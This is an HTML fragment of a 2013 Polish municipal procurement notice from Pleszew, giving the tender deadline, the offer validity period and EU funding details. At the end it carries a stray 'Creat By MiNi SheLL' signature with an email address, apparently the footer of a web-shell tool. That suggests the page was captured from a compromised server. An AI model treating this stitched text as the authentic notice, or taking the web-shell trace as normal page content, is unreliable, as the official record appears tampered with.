<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w pleszewie, Rynek 1, 63-300 Pleszew, pokój nr 213B.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.09.2013 godzina 10:00, miejsce: Urząd Miasta i Gminy w Pleszewie, Rynek 1, 63-300 Pleszew, pokój nr 103 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Pomoc Techniczna 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com